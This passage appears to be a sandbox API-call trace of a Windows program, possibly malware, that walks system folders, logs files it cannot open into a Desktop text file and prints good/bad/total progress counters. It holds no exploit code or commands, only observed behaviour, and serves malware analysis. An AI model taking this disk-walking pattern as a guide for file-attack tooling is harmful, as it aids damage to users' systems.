Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKPOINTDATA.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\parse.dat\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.SIUF.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\". The system cannot find the file specified\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\Journal", lpUsedDefaultChar=0x0) returned 17253 [0292.758] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ed2b78*, nNumberOfBytesToWrite=0x4365, lpNumberOfBytesWritten=0x63fe20, lpOverlapped=0x0 | out: lpBuffer=0x1ed2b78*, lpNumberOfBytesWritten=0x63fe20*=0x4365, lpOverlapped=0x0) returned 1 [0292.760] CloseHandle (hObject=0x2f4) returned 1 [0292.760] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=1221 / B=46 / T=2891", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0292.760] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=1221 / B=46 / T=2891", cchWideChar=40, lpMultiByteStr=0x1ff3c1c, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=1221 / B=46 / T=2891", lpUsedDefaultChar=0x0) returned 40 [0292.760] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x28, lpOverlapped=0x0) returned 1 [0292.764] Sleep (dwMilliseconds=0x5dc) [0294.279] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\bad_460F9943EA70F103.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\bad_460f9943ea70f103.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0294.287] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\r\nFNF: C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\restaurant.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\r\nFNF: C:\\ProgramData\\Oracle\\Java\\installcache_x64\\baseimagefam8\r\nFNF: C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp\r\nFNF: C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\n", cchWideChar=4380, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4380 [0294.287] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\r\nFNF: C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\restaurant.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\r\nFNF: C:\\ProgramData\\Oracle\\Java\\installcache_x64\\baseimagefam8\r\nFNF: C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp\r\nFNF: C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\n", cchWideChar=4380, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4380 [0294.287] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\r\nFNF: C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\restaurant.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\r\nFNF: C:\\ProgramData\\Oracle\\Java\\installcache_x64\\baseimagefam8\r\nFNF: C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp\r\nFNF: C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\n", cchWideChar=4380, lpMultiByteStr=0x2476938, cbMultiByte=4380, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\r\nFNF: C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\restaurant.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\r\nFNF: C:\\ProgramData\\Oracle\\Java\\installcache_x64\\baseimagefam8\r\nFNF: C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp\r\nFNF: C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\r\nATO_OPER: C:\\Program Files\\Windows 